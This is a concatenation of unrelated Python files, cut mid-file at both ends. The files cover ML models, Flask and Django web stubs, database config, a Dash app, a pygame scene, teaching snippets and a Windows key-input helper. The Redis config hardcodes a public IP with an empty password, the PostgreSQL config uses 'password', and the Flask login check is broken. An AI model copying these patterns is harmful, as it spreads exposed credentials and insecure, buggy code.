self.l1 = nn.Linear(nFeats_in, nFeats_out, bias=bias)
if self.dropout > 0:
self.l1dropout = nn.Dropout(self.dropout, inplace=True)
init.kaiming_normal(self.l1.weight)
self.l2 = nn.Linear(nFeats_out, 2)
init.kaiming_normal(self.l2.weight)
self.bn1 = nn.BatchNorm1d(nFeats_out)
self.relu = nn.ReLU(inplace=True)
else:
self.list = True
self.hids = nn.ModuleList()
self.bns = nn.ModuleList()
if self.dropout > 0:
self.dropout_l = nn.Dropout(inplace=True)
for i in range(len(layer_list) - 1):
self.hids.append(nn.Linear(layer_list[i], layer_list[i+1], bias=False))
init.kaiming_normal(self.hids[-1].weight)
self.bns.append(nn.BatchNorm1d(layer_list[i+1]))
self.lout = nn.Linear(layer_list[-1], 2)
init.kaiming_normal(self.lout.weight)
self.crossentropy = nn.CrossEntropyLoss()
self.score = None
def check_result(self, y):
y = torch.cat(y).data
correct = self.score.eq(y).cpu().sum()
return correct
def forward(self, x, y):
y_ = torch.cat(y)
x = torch.cat(x, 0)
if not self.list:
x = self.l1(x)
x = self.bn1(x)
x = self.relu(x)
if self.dropout > 0:
x = self.l1dropout(x)
x = self.l2(x)
else:
for i in range(len(self.hids)):
x = self.hids[i](x)
x = self.bns[i](x)
x = F.relu(x, inplace=True)
if self.dropout > 0:
x = self.dropout_l(x)
x= self.lout(x)
self.score = x.data.max(1)[1]
loss = self.crossentropy(x, y_)
return loss
|
from flask import render_template,request
from DCapi import app
from DCapi.humanresource.data.user import users
@app.route('/',methods=['get','post'])
def index():
return '11'
#return render_template('test.html',url='/login',form=True)
@app.route('/login',methods=['get','post'])
def login():
formdata=request.form.to_dict()
if formdata in users['user']:
return render_template('test.html',table=True)
else:
return False
@app.route('/main',methods=['get','post'])
def mainpage():
return render_template('main.html')
@app.route('/test',methods=['get','post'])
def test():
return 'test'
#return render_template('testjinjia.html')
@app.route('/test01',methods=['get','post'])
def test01():
return render_template('test01.html')
@app.route('/test02',methods=['get','post'])
def test02():
return render_template('test02.html') |
"""
Example script using PyOpenPose.
"""
import argparse
from libs import pyopenpose as op
import time
import cv2
import os
OPENPOSE_ROOT = os.environ["OPENPOSE_ROOT"]
def run():
cap = cv2.VideoCapture(args.filename)
params = dict()
params["model_folder"] = OPENPOSE_ROOT + os.sep + "models" + os.sep
params["face"] = True
params["hand"] = True
params["disable_blending"] = False
#op = OP.OpenPose((656, 368), (368, 368), (1280, 720), "COCO", OPENPOSE_ROOT + os.sep + "models" + os.sep, 0,
# False, OP.OpenPose.ScaleMode.ZeroToOne, with_face, with_hands)
opWrapper = op.WrapperPython()
opWrapper.configure(params)
opWrapper.start()
paused = False
delay = {True: 0, False: 1}
count = 0
wasted = 0
print("Entering main Loop.")
datum = op.Datum()
while True:
try:
_, frame = cap.read()
if frame is None:
break
except Exception as e:
print("Failed to grab", e)
break
datum.cvInputData = frame
opWrapper.emplaceAndPop([datum])
# print("Body keypoints: \n" + str(datum.poseKeypoints))
# print("Face keypoints: \n" + str(datum.faceKeypoints))
# print("Left hand keypoints: \n" + str(datum.handKeypoints[0]))
# print("Right hand keypoints: \n" + str(datum.handKeypoints[1]))
persons = datum.poseKeypoints
if persons is None:
print("No Person")
wasted+=1
continue
try:
if persons is not None and len(persons) > 1:
print("Person > 1 ", persons[0].shape)
wasted+=1
continue
except TypeError:
wasted+=1
continue
cv2.imshow("OpenPose result", datum.cvOutputData)
count += 1
print("count : ", count, " / ","wasted : ", wasted)
cv2.imwrite("original/{}.png".format(count), datum.cvInputData)
cv2.imwrite("landmarks/{}.png".format(count), datum.cvOutputData)
'''
key = cv2.waitKey(delay[paused])
if key & 255 == ord('p'):
paused = not paused
if key & 255 == ord('q'):
break
'''
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--file', dest='filename', type=str, help='Name of the video file.')
args = parser.parse_args()
if not os.path.exists(os.path.join('./', 'original')):
os.makedirs(os.path.join('./', 'original'))
if not os.path.exists(os.path.join('./', 'landmarks')):
os.makedirs(os.path.join('./', 'landmarks'))
run()
|
"""undeadthread URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
import sys
from django.http import HttpResponse
ONE_UNDEAD_THREAD_FLAG = False
def undeadthread(request):
import threading
threading.Thread(target=loop, daemon=True).start()
return HttpResponse("it works")
def loop():
global ONE_UNDEAD_THREAD_FLAG
from time import sleep, ctime
if not ONE_UNDEAD_THREAD_FLAG:
ONE_UNDEAD_THREAD_FLAG = True
else:
return
while True:
print(ctime(), file=sys.stderr)
sleep(2)
urlpatterns = [
path('admin/', admin.site.urls),
]
urlpatterns += [
path('undeadthread', undeadthread),
]
|
# -*- coding: utf-8 -*-
# @Time : 2019/5/16 2:29 PM
# @Author : Shande
# @Email : seventhedog@163.com
# @File : db_config.py
# @Software: PyCharm
class DBConfig(object):
"""redis的db配置:
db=1:用户登陆
"""
_redis_conf = {
'host': '101.132.186.25',
# 'host': '47.100.63.158',
# 'host': '127.0.0.1',
'port': 6379,
'password': '',
}
@classmethod
def get_redis_host(cls):
return cls._redis_conf.get('host')
@classmethod
def get_redis_port(cls):
return cls._redis_conf.get('port')
|
"""
Dash port of Shiny faithful example:
https://shiny.rstudio.com/gallery/faithful.html
Note: the shiny version includes a slider for adjusting the bandwidth of the
density approximation curve, which is not easily adjusted when using
plotly.figure_factory.create_distplot, so it doesn't feature in this example.
"""
import dash
import dash_bootstrap_components as dbc
import pandas as pd
import plotly.figure_factory as ff
from dash import Input, Output, dcc, html
DATA = pd.read_csv("https://cdn.opensource.faculty.ai/old-faithful/data.csv")
app = dash.Dash(external_stylesheets=[dbc.themes.BOOTSTRAP])
dropdown = html.Div(
[
dbc.Label("Number of bins in histogram (approximate):"),
dcc.Dropdown(
id="dropdown",
options=[{"label": n, "value": n} for n in [10, 20, 35, 50]],
value=20,
),
]
)
checklist = html.Div(
[
dbc.Label("Extras:"),
dbc.Checklist(
id="checklist",
options=[
{"label": "Show individual observations", "value": "show_ind"},
{"label": "Show density estimate", "value": "show_dens"},
],
value=[],
inline=True,
),
]
)
app.layout = dbc.Container(
[
html.H1("Old Faithful eruption data"),
html.Hr(),
dbc.Row(
[
dbc.Col(dropdown),
dbc.Col(checklist, width="auto", align="center"),
]
),
html.Br(),
dcc.Graph(id="graph"),
]
)
@app.callback(
Output("graph", "figure"),
[Input("dropdown", "value"), Input("checklist", "value")],
)
def make_graph(dropdown_value, checklist_value):
bin_size = (DATA.eruptions.max() - DATA.eruptions.min()) / dropdown_value
fig = ff.create_distplot(
[DATA.eruptions],
["Eruption duration"],
bin_size=bin_size,
show_curve="show_dens" in checklist_value,
show_rug="show_ind" in checklist_value,
)
fig["layout"].update(
{
"title": "Geyser eruption duration",
"showlegend": False,
"xaxis": {"title": "Duration (minutes)"},
"yaxis": {"title": "Density"},
}
)
return fig
if __name__ == "__main__":
app.run_server(debug=True, port=8888)
|
class PriorityQueue(Queue):
def __init__(self, list = [], _ascending = True, _sortFunc = None):
super().__init__(*list)
self.ascending = _ascending
if(_sortFunc is None):
_sortFunc = self.defaultSortFunc
def defaultSortFunc(self):
pass
def enqueue(self, item):
self.queue.append(item)
# q = Queue(53,46,100,98,96,82,16,4,13,82)
# q.enqueue(1)
# q.enqueue(-1)
# q.dequeue()
# print(q.size)
# print(q) |
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
SQLITE = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
POSTGRESQL = {
'default' : {
'ENGINE' :
'django.db.backends.postgresql_psycopg2',
'NAME':'Tienda',
'USER':'postgres',
'PASSWORD':'password',
'HOST':'localhost',
'PORT':'5432'
}
} |
#!/usr/bin/env python3
import os
import csv
def main():
masterfile = open("graph.csv",'w')
writer = csv.writer(masterfile)
writer.writerow(["Node", "Connected","Local","Remote"])
row = []
remote = False
aruba = False
for line in open("CDP-neighbors.txt","r"):
#initialize every row of the csv
if ("_" in line):
if (len(row)!=0):
writer.writerow(row)
remote = False
aruba = False
row = []
if ("aruba" in line):
#check if it is aruba router
row.append(line.split('-')[0].strip()+line.split('-')[1].strip())
aruba = True
if (aruba and ".colgate.edu" in line):
row.append(line.split()[1])
row.append(line.split()[0])
row.append("none")
if (".colgate.edu" in line and not remote and not aruba):
row.append((line.split('.')[0]).strip())
remote = True
elif (".colgate.edu" in line and remote and not aruba):
row.append((line.split('.')[0]).strip())
if (("WS" in line or "XL" in line or "XM" in line) and not aruba):
row.append(line.split()[0]+line.split()[1])
row.append(line.split()[-2]+line.split()[-1])
main()
|
from django.shortcuts import render
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.authtoken.models import Token
from django.shortcuts import get_object_or_404
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import generics
from Profile.models import Profile
from Profile.models import ModelCiudad
from Profile.models import ModelGenero
from Profile.models import ModelOcupacion
from Profile.models import ModelEstado
from Profile.models import ModelEstadoCivil
from Profile.serializer import ProfileSerializers
from Profile.serializer import CiudadSerializers
from Profile.serializer import GeneroSerializers
from Profile.serializer import OcupacionSerializers
from Profile.serializer import EstadoSerializers
from Profile.serializer import EstadoCivilSerializers
class ProfileList(APIView):
def get(self, request, format=None):
print("Metodo get filter")
queryset = Profile.objects.filter(delete = False)
serializer = ProfileSerializers(queryset, many=True)
return Response(serializer.data)
def post(self, request, format=None):
serializer = ProfileSerializers(data = request.data)
if serializer.is_valid():
serializer.save()
datas = serializer.data
return Response(datas)
return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)
class CiudadList(APIView):
def get(self, request, format=None):
print("Metodo get filter")
queryset = ModelCiudad.objects.filter(delete = False)
serializer = CiudadSerializers(queryset, many=True)
return Response(serializer.data)
def post(self, request, format=None):
serializer = CiudadSerializers(data = request.data)
if serializer.is_valid():
serializer.save()
datas = serializer.data
return Response(datas)
return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)
class GeneroList(APIView):
def get(self, request, format=None):
print("Metodo get filter")
queryset = ModelGenero.objects.filter(delete = False)
serializer = GeneroSerializers(queryset, many=True)
return Response(serializer.data)
def post(self, request, format=None):
serializer = GeneroSerializers(data = request.data)
if serializer.is_valid():
serializer.save()
datas = serializer.data
return Response(datas)
return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)
class OcupacionList(APIView):
def get(self, request, format=None):
print("Metodo get filter")
queryset = ModelOcupacion.objects.filter(delete = False)
serializer = OcupacionSerializers(queryset, many=True)
return Response(serializer.data)
def post(self, request, format=None):
serializer = OcupacionSerializers(data = request.data)
if serializer.is_valid():
serializer.save()
datas = serializer.data
return Response(datas)
return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)
class EstadoList(APIView):
def get(self, request, format=None):
print("Metodo get filter")
queryset = ModelEstado.objects.filter(delete = False)
serializer = EstadoSerializers(queryset, many=True)
return Response(serializer.data)
def post(self, request, format=None):
serializer = EstadoSerializers(data = request.data)
if serializer.is_valid():
serializer.save()
datas = serializer.data
return Response(datas)
return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)
class EstadoCivilList(APIView):
def get(self, request, format=None):
print("Metodo get filter")
queryset = ModelEstadoCivil.objects.filter(delete = False)
serializer = EstadoCivilSerializers(queryset, many=True)
return Response(serializer.data)
def post(self, request, format=None):
serializer = EstadoCivilSerializers(data = request.data)
if serializer.is_valid():
serializer.save()
datas = serializer.data
return Response(datas)
return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)
# Create your views here.
|
# Generated by Django 2.2.6 on 2019-10-02 18:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('qrCodeApp', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='qrcodeurldata',
options={'verbose_name': 'QR Code Base Data', 'verbose_name_plural': 'QR Code Base Data'},
),
migrations.RenameField(
model_name='qrcodeurldata',
old_name='url_host',
new_name='key',
),
migrations.RemoveField(
model_name='qrcodeurldata',
name='gtin_code',
),
migrations.RemoveField(
model_name='qrcodeurldata',
name='hash_code',
),
migrations.RemoveField(
model_name='qrcodeurldata',
name='serial_code',
),
migrations.AddField(
model_name='qrcodeurldata',
name='value',
field=models.CharField(default=1, max_length=25),
preserve_default=False,
),
]
|
#!/usr/bin/env python
import pygame
import mimo
import enum
from utils import utils
from utils import neopixelmatrix as graphics
from utils import ringpixel as ring
from utils.NeoSprite import NeoSprite, AnimatedNeoSprite, TextNeoSprite, SpriteFromFrames
from utils import constants
from scenes.BaseScene import SceneBase
from scenes.edition.FinishEventScene import FinishEventScene
# Optimization Scene
# PLAY STATUS #3
# depending on the selected material the player will have
# the opportunity to increase the impact of the transmission
# one of many possible minigames will be loaded and displayed
# to the player
# next screen will depend on player's actions
class STATUS(enum.Enum):
FINISHING = 1
PLAYING = 2
class OptimizationScene(SceneBase):
def __init__(self):
SceneBase.__init__(self)
# -- initialize state --------------------------------------------------
self.state = STATUS.PLAYING
# in milliseconds
self.countdown = 20000
self.current_time = 20000
self.popup_active = False
self.score = 0
self.SetupMimo()
# -- setup layout ------------------------------------------------------
self.SetupLayout()
self.SetupPopup()
#ring.fill()
#ring.current_color = [0,0,0]
def SetupMimo(self):
mimo.set_led_brightness(200)
def SetupLayout(self):
self.frame = utils.Sprite(
constants.SPRITES_OPTIMIZATION + 'optimization-frame.png',
constants.VIEWPORT_CENTER_X,
constants.VIEWPORT_CENTER_Y
)
opt_text = 'news optimization'
if constants.language == 'es':
opt_text = 'optimización de noticia'
self.title = utils.Text(
opt_text + ' - ' + self.minigametitle,
self.subtitle_font,
color=constants.PALETTE_TEXT_PURPLE
)
self.title.SetPosition(constants.VIEWPORT_CENTER_X, 40)
self.timerprogress = 1.0
self.timerBackground = utils.Sprite(
constants.SPRITES_OPTIMIZATION+'timer_bar-background.png',
0,
77
)
self.timerBackground.setAnchor(0,0)
def SetupPopup(self):
bg_image_name = 'optimization_results-popup.png'
if constants.language == 'es':
bg_image_name = 'optimization_finished-popup-es.png'
self.results_background = utils.Sprite(
constants.SPRITES_OPTIMIZATION + bg_image_name,
640,
360
)
self.popup_description = utils.Text(
"you are awesome!",
self.subtitle_font,
color=constants.PALETTE_TEXT_RED
)
self.popup_description.SetPosition(constants.VIEWPORT_CENTER_X, 380)
self.bonus_text = utils.Text(
"++!",
self.subtitle_font,
color=constants.PALETTE_TEXT_CYAN
)
self.bonus_text.SetPosition(constants.VIEWPORT_CENTER_X, 420)
next_news_text = "press to edit the next news"
if constants.language == 'es':
next_news_text = 'presiona para editar otra noticia'
self.right_progress_label = utils.Text(
next_news_text,
self.subtitle_font,
color = constants.PALETTE_TEXT_CYAN
)
self.right_progress_label.setAnchor(1, 0)
self.right_progress_label.SetPosition(1200, 660)
self.right_progress_icon = utils.Sprite(
"assets/sprites/scenes/common/progress-button-green.png",
745 if constants.language == 'en' else 684,
642
)
self.right_progress_icon.setAnchor(1, 0)
def ProcessInput(self, events, pressed_keys):
if not self.IsPlaying():
for event in events:
if event.type == pygame.KEYDOWN and event.key == pygame.K_i:
self.UI_SwitchScene = utils.get_sound('assets/audio/SFX/Scanning/MG1_ObjSort.ogg')
self.UI_SwitchScene.play()
self.AddTrigger(0.16, self, 'SwitchToScene', "Edit")
utils.stop_music()
pass
return
self.ProcessInputOpt(events, pressed_keys)
# in milliseconds
def format_time(time):
to_string = ""
mins = time//72000
seconds = (time%72000)//1000
cents = (time%1000)//10
if mins < 10:
to_string += "0"
to_string += str(mins) + ":"
if seconds < 10:
to_string += "0"
to_string += str(seconds) + ":"
if cents < 10:
to_string += "0"
to_string += str(cents)
return to_string
def Update(self, dt):
SceneBase.Update(self, dt)
if self.IsPlaying():
self.current_time -= int(1000 * dt)
if self.current_time < 0:
self.FinishOptimization()
self.current_time = 0
self.timerprogress = self.current_time/self.countdown
ring.fill_percentage(self.timerprogress)
#self.timer.SetText(OptimizationScene.format_time(self.current_time), False)
def RenderBackground(self, screen):
self.frame.RenderWithAlpha(screen)
self.title.RenderWithAlpha(screen)
def Render(self, screen):
self.RenderBackground(screen)
self.RenderTimer(screen)
self.RenderBody(screen)
if self.popup_active:
self.RenderPopup(screen)
return
self.RenderCortain(screen)
self.RenderTimeoutAlert(screen)
def RenderBody(screen):
pass
def RenderTimer(self, screen):
self.timerBackground.RenderWithAlpha(screen)
interval = (int(self.timerprogress*35))/35
pygame.draw.rect(screen, [0xFF, 0x40, 0x7A], (0, 77, interval * 1280, 38))
pygame.draw.rect(screen, [0x04, 0x00, 0x00], (0, 77, 1280, 38), 2)
# should display the results
# then shutdown this scene and change it to next one
def FinishOptimization(self):
self.state = STATUS.FINISHING
#self.BlinkTimer()
self.DisplayResults()
#self.AddTrigger(3.0, self, 'SwitchToScene', FinishEventScene)
def BlinkTimer(self):
self.AddTween("easeInOutSine", 0.3, self.timer, "opacity", 255, 0, 0)
self.AddTween("easeInOutSine", 0.3, self.timer, "opacity", 0, 255, 0.31)
self.AddTrigger(0.6, self, 'BlinkTimer')
def IsPlaying(self):
return self.state == STATUS.PLAYING
def DisplayResults(self):
self.popup_active = True
performance_text = ""
bonus_text = ""
if constants.language == 'en':
if self.score < 0.2:
performance_text = "Optimization Shut Down"
bonus_text = "-10 seconds"
elif self.score < 0.4:
performance_text = "Sluggish Performance"
bonus_text = "Continue The Test"
elif self.score < 0.6:
performance_text = "Poor Execution"
bonus_text = "Idleness Is Fatal Only To The Mediocre"
elif self.score < 0.8:
performance_text = "Broadcast Reach Enhanced"
bonus_text = "10 seconds bonus"
else:
performance_text = "Edition Optimized!"
bonus_text = "20 seconds bonus"
elif constants.language == 'es':
if self.score < 0.2:
performance_text = "optimización detenida"
bonus_text = "-10 segundos"
elif self.score < 0.4:
performance_text = "rendimiento lento"
bonus_text = "continuar con la prueba"
elif self.score < 0.6:
performance_text = "mala ejecución"
bonus_text = "la inactividad es fatal sólo para el mediocre"
elif self.score < 0.8:
performance_text = "alcance de transmisión aumentado"
bonus_text = "10 segundos de bonificación"
else:
performance_text = "¡noticia optimizada!"
bonus_text = "20 segundos de bonificación"
self.popup_description.SetText(performance_text)
self.bonus_text.SetText(bonus_text)
mimo.set_buttons_enable_status(True, False)
mimo.set_material_buttons_mode([6,0])
mimo.set_material_buttons_light([6, 0x27, 0xff, 0x93])
mimo.set_material_buttons_active_status([6, 1])
def RenderPopup(self, screen):
self.results_background.RenderWithAlpha(screen)
self.popup_description.render(screen)
self.bonus_text.render(screen)
self.right_progress_label.RenderWithAlpha(screen)
self.right_progress_icon.RenderWithAlpha(screen)
|
import numpy as np
import lasagne
from braindecode.experiments.experiment import create_experiment
def load_model(basename):
"""Load model with params from .yaml and .npy files."""
exp = create_experiment(basename + '.yaml')
params = np.load(basename + '.npy')
model = exp.final_layer
set_param_values_backwards_compatible(model, params)
return model
def load_exp_and_model(basename, set_invalid_to_NaN=True, seed=9859295):
""" Loads experiment and model for analysis, sets invalid fillv alues to NaN."""
model = load_model(basename)
exp = create_experiment(basename + '.yaml', seed=seed)
if set_invalid_to_NaN:
all_layers = lasagne.layers.get_all_layers(model)
# mark nans to be sure you are doing correct transformations
# also necessary for transformations to cnt and time activations
for l in all_layers:
if hasattr(l, 'invalid_fill_value'):
l.invalid_fill_value = np.nan
return exp, model
def set_param_values_backwards_compatible(final_layer, param_values):
"""Backwards compatible for old batch norm layer params."""
old_batch_norm_layer_used = False
for param, param_val in zip(lasagne.layers.get_all_params(final_layer), param_values):
if param.get_value().shape == param_val.shape:
param.set_value(param_val)
# account for change in batch norm layer
elif param.get_value().ndim == 1 and param_val.ndim == 4:
old_batch_norm_layer_used = True
assert param.get_value().shape[0] == param_val.shape[1]
if param.name == 'inv_std': # was std before, now inv std
# assuming epsilon was always 1e-4 :)
#epsilon = 1e-4
#param_val = 1.0 / (param_val + epsilon)
pass
else:
assert param.name in ['mean', 'beta', 'gamma'], (
"Unexpected param name {:s}".format(
param.name))
param.set_value(param_val[0,:,0,0])
else:
raise ValueError("Different shapes for parameters, constructed model:"
"{:s}, param value: {:s}".format(
str(param.get_value().shape), str(param_val.shape)))
for l in lasagne.layers.get_all_layers(final_layer):
if (l.__class__.__name__ == 'BatchNormLayer' and
old_batch_norm_layer_used):
print("Correcting for old batch norm layer")
false_mean = l.mean.get_value()
false_inv_std = l.inv_std.get_value()
false_beta = l.beta.get_value()
false_gamma = l.gamma.get_value()
l.mean.set_value(false_beta)
l.inv_std.set_value(1.0 / (false_gamma + l.epsilon))
l.beta.set_value(false_mean)
l.gamma.set_value(false_inv_std)
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# ------------------------------------------------------------------
# -------------------- 实现switch类似功能 --------------------
# ------------------------------------------------------------------
# 实例1
choice = 'ham'
print({'spam': 1, 'ham': 1.99, 'eggs': 3, 'bacon': 1.1}[choice])
# 等价于
if choice == 'spam':
print(1)
elif choice == 'ham':
print(1.99)
elif choice == 'eggs':
print(3)
elif choice == 'bacom':
print(1.1)
else:
print('Error')
# 实例2,加减乘除的实现1
def add(num1, num2):
return num1 + num2
def sub(num1, num2):
return num1 - num2
def mul(num1, num2):
return num1 * num2
def div(num1, num2):
return num1 / num2
operator = {'+': add, '-': sub, '*': mul, '/': div}
res = operator['+'](1, 2)
print(res)
# 实例3,加减乘除的实现2
def adde():
return a + b
def sube():
return a - b
def mule():
return a * b
def dive():
return a / b
a = 5
b = 7
operator = {'+': adde(), '-': sube(), '*': mule(), '/': dive()}
res = operator['*']
print(res)
# 更多用法,请看"V - 函数\\switch语句的实现.py"
print("更多用法,请看'V - 函数\\switch语句的实现.py'")
# ------------------------------------------------------------------
# ----------------------- if的通用格式 -----------------------
# ------------------------------------------------------------------
# if 的通用格式
# if <test1>:
# <statement1>
# elif <test2>:
# <statement2>
# else:
# <statement3>
# ------------------------------------------------------------------
# ---------------------- if的三元表达式 ----------------------
# ------------------------------------------------------------------
# A = X if Y else Z
b = 'spams'
a = 'temp' if b == 'spam' else 'test'
print(a)
|
# 2017-03-11 jkang
# practice tf.cond
# ref: http://web.stanford.edu/class/cs20si
import tensorflow as tf
x = tf.random_uniform([], -1, 1) # random value from -1 ~ 1
y = tf.random_uniform([], -1, 1) # random value from -1 ~ 1
out = tf.cond(tf.less(x, y), lambda: tf.add(x, y), lambda: tf.sub(x, y))
'''
if 1st arg of tf.cond is TRUE:
tf.add(x,y) is run
if 1st arg of tf.cond is FALSE:
tf.sub(x,y) is run
'''
sess = tf.InteractiveSession()
print(sess.run(tf.less(x, y)))
print(sess.run(out))
sess.close()
|
# Code by Daniel Kukiela (https://twitter.com/daniel_kukiela)
# Originally acquired from the repository by sentdex (https://github.com/Sentdex/pygta5)
import ctypes
from threading import Thread
from time import time, sleep
from queue import Queue
# main keys class
class Keys(object):
common = None
standalone = False
# instance of worker class
keys_worker = None
keys_process = None
# key constants
direct_keys = 0x0008
virtual_keys = 0x0000
key_press = 0x0000
key_release = 0x0002
# mouse constants
mouse_move = 0x0001
mouse_lb_press = 0x0002
mouse_lb_release = 0x0004
mouse_rb_press = 0x0008
mouse_rb_release = 0x0010
mouse_mb_press = 0x0020
mouse_mb_release = 0x0040
# direct keys
dk = {
"1": 0x02,
"2": 0x03,
"3": 0x04,
"4": 0x05,
"5": 0x06,
"6": 0x07,
"7": 0x08,
"8": 0x09,
"9": 0x0A,
"0": 0x0B,
"NUMPAD1": 0x4F, "NP1": 0x4F,
"NUMPAD2": 0x50, "NP2": 0x50,
"NUMPAD3": 0x51, "NP3": 0x51,
"NUMPAD4": 0x4B, "NP4": 0x4B,
"NUMPAD5": 0x4C, "NP5": 0x4C,
"NUMPAD6": 0x4D, "NP6": 0x4D,
"NUMPAD7": 0x47, "NP7": 0x47,
"NUMPAD8": 0x48, "NP8": 0x48,
"NUMPAD9": 0x49, "NP9": 0x49,
"NUMPAD0": 0x52, "NP0": 0x52,
"DIVIDE": 0xB5, "NPDV": 0xB5,
"MULTIPLY": 0x37, "NPM": 0x37,
"SUBSTRACT": 0x4A, "NPS": 0x4A,
"ADD": 0x4E, "NPA": 0x4E,
"DECIMAL": 0x53, "NPDC": 0x53,
"NUMPADENTER": 0x9C, "NPE": 0x9C,
"A": 0x1E,
"B": 0x30,
"C": 0x2E,
"D": 0x20,
"E": 0x12,
"F": 0x21,
"G": 0x22,
"H": 0x23,
"I": 0x17,
"J": 0x24,
"K": 0x25,
"L": 0x26,
"M": 0x32,
"N": 0x31,
"O": 0x18,
"P": 0x19,
"Q": 0x10,
"R": 0x13,
"S": 0x1F,
"T": 0x14,
"U": 0x16,
"V": 0x2F,
"W": 0x11,
"X": 0x2D,
"Y": 0x15,
"Z": 0x2C,
"F1": 0x3B,
"F2": 0x3C,
"F3": 0x3D,
"F4": 0x3E,
"F5": 0x3F,
"F6": 0x40,
"F7": 0x41,
"F8": 0x42,
"F9": 0x43,
"F10": 0x44,
"F11": 0x57,
"F12": 0x58,
"UP": 0xC8,
"LEFT": 0xCB,
"RIGHT": 0xCD,
"DOWN": 0xD0,
"ESC": 0x01,
"SPACE": 0x39, "SPC": 0x39,
"RETURN": 0x1C, "ENT": 0x1C,
"INSERT": 0xD2, "INS": 0xD2,
"DELETE": 0xD3, "DEL": 0xD3,
"HOME": 0xC7,
"END": 0xCF,
"PRIOR": 0xC9, "PGUP": 0xC9,
"NEXT": 0xD1, "PGDN": 0xD1,
"BACK": 0x0E,
"TAB": 0x0F,
"LCONTROL": 0x1D, "LCTRL": 0x1D,
"RCONTROL": 0x9D, "RCTRL": 0x9D,
"LSHIFT": 0x2A, "LSH": 0x2A,
"RSHIFT": 0x36, "RSH": 0x36,
"LMENU": 0x38, "LALT": 0x38,
"RMENU": 0xB8, "RALT": 0xB8,
"LWIN": 0xDB,
"RWIN": 0xDC,
"APPS": 0xDD,
"CAPITAL": 0x3A, "CAPS": 0x3A,
"NUMLOCK": 0x45, "NUM": 0x45,
"SCROLL": 0x46, "SCR": 0x46,
"MINUS": 0x0C, "MIN": 0x0C,
"LBRACKET": 0x1A, "LBR": 0x1A,
"RBRACKET": 0x1B, "RBR": 0x1B,
"SEMICOLON": 0x27, "SEM": 0x27,
"APOSTROPHE": 0x28, "APO": 0x28,
"GRAVE": 0x29, "GRA": 0x29,
"BACKSLASH": 0x2B, "BSL": 0x2B,
"COMMA": 0x33, "COM": 0x33,
"PERIOD": 0x34, "PER": 0x34,
"SLASH": 0x35, "SLA": 0x35,
}
# virtual keys
vk = {
"1": 0x31,
"2": 0x32,
"3": 0x33,
"4": 0x34,
"5": 0x35,
"6": 0x36,
"7": 0x37,
"8": 0x38,
"9": 0x39,
"0": 0x30,
"NUMPAD1": 0x61, "NP1": 0x61,
"NUMPAD2": 0x62, "NP2": 0x62,
"NUMPAD3": 0x63, "NP3": 0x63,
"NUMPAD4": 0x64, "NP4": 0x64,
"NUMPAD5": 0x65, "NP5": 0x65,
"NUMPAD6": 0x66, "NP6": 0x66,
"NUMPAD7": 0x67, "NP7": 0x67,
"NUMPAD8": 0x68, "NP8": 0x68,
"NUMPAD9": 0x69, "NP9": 0x69,
"NUMPAD0": 0x60, "NP0": 0x60,
"DIVIDE": 0x6F, "NPDV": 0x6F,
"MULTIPLY": 0x6A, "NPM": 0x6A,
"SUBSTRACT": 0x6D, "NPS": 0x6D,
"ADD": 0x6B, "NPA": 0x6B,
"DECIMAL": 0x6E, "NPDC": 0x6E,
"NUMPADENTER": 0x0D, "NPE": 0x0D,
"A": 0x41,
"B": 0x42,
"C": 0x43,
"D": 0x44,
"E": 0x45,
"F": 0x46,
"G": 0x47,
"H": 0x48,
"I": 0x49,
"J": 0x4A,
"K": 0x4B,
"L": 0x4C,
"M": 0x4D,
"N": 0x4E,
"O": 0x4F,
"P": 0x50,
"Q": 0x51,
"R": 0x52,
"S": 0x53,
"T": 0x54,
"U": 0x55,
"V": 0x56,
"W": 0x57,
"X": 0x58,
"Y": 0x59,
"Z": 0x5A,
"F1": 0x70,
"F2": 0x71,
"F3": 0x72,
"F4": 0x73,
"F5": 0x74,
"F6": 0x75,
"F7": 0x76,
"F8": 0x77,
"F9": 0x78,
"F10": 0x79,
"F11": 0x7A,
"F12": 0x7B,
"UP": 0x26,
"LEFT": 0x25,
"RIGHT": 0x27,
"DOWN": 0x28,
"ESC": 0x1B,
"SPACE": 0x20, "SPC": 0x20,
"RETURN": 0x0D, "ENT": 0x0D,
"INSERT": 0x2D, "INS": 0x2D,
"DELETE": 0x2E, "DEL": 0x2E,
"HOME": 0x24,
"END": 0x23,
"PRIOR": 0x21, "PGUP": 0x21,
"NEXT": 0x22, "PGDN": 0x22,
"BACK": 0x08,
"TAB": 0x09,
"LCONTROL": 0xA2, "LCTRL": 0xA2,
"RCONTROL": 0xA3, "RCTRL": 0xA3,
"LSHIFT": 0xA0, "LSH": 0xA0,
"RSHIFT": 0xA1, "RSH": 0xA1,
"LMENU": 0xA4, "LALT": 0xA4,
"RMENU": 0xA5, "RALT": 0xA5,
"LWIN": 0x5B,
"RWIN": 0x5C,
"APPS": 0x5D,
"CAPITAL": 0x14, "CAPS": 0x14,
"NUMLOCK": 0x90, "NUM": 0x90,
"SCROLL": 0x91, "SCR": 0x91,
"MINUS": 0xBD, "MIN": 0xBD,
"LBRACKET": 0xDB, "LBR": 0xDB,
"RBRACKET": 0xDD, "RBR": 0xDD,
